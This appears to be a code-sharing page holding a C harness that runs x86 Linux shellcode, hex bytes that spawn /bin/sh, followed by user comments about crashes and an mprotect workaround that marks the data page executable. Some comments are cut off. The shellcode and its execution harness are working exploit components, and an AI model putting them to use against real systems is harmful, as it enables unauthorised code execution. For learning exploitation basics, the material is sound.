#include<stdio.h> | |
#include<string.h> | |
unsigned char code[] = \ | |
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"; | |
main() | |
{ | |
printf("Shellcode Length: %d\n", strlen(code)); | |
int (*ret)() = (int(*)())code; | |
ret(); | |
} | |
This comment has been minimized.
This comment has been minimized.
This comment has been minimized.
This comment has been minimized.
Well of course, you're running Linux Shellcode in a windows environment..... The xcd\x80 should have given this away... |
This comment has been minimized.
This comment has been minimized.
for the future noobs: this is an x86 linux shellcode that will spawn a
if you face the "sys/cdefs.h: No such file or directory" fatal error; I hope this helped! |
This comment has been minimized.
This comment has been minimized.
S/O to AddaxSoft for the great insight, such a homie! |
This comment has been minimized.
This comment has been minimized.
Illegal instruction? |
This comment has been minimized.
This comment has been minimized.
This doesnt help (anymore?) first: the code is not on the stack - its in the .data segment, thus for the future and past noobs: At least on my x64 the memory page is not executable (x86 only has r/w, x64 has r/w/x, thats why it always works on x86 and the problem does not occur there) int main(){
printf("Shellcode length: %d\n", strlen(code));
int r = mprotect((void *)((int)code & ~4095), 4096, PROT_READ | PROT_WRITE|PROT_EXEC);
printf("mprotect: %d\n",r);
int (*ret)() = (int(*)())code;
return ret();
}
Why
Its the page alignment. (so to speak "drop the last three nibbles of the address" since the page is 4K this will result in the beginning of the page where the code[] is stored) now you can indeed compile: gcc -m32 shellcodetest.c
./a.out |
This comment has been minimized.
Segmentation fault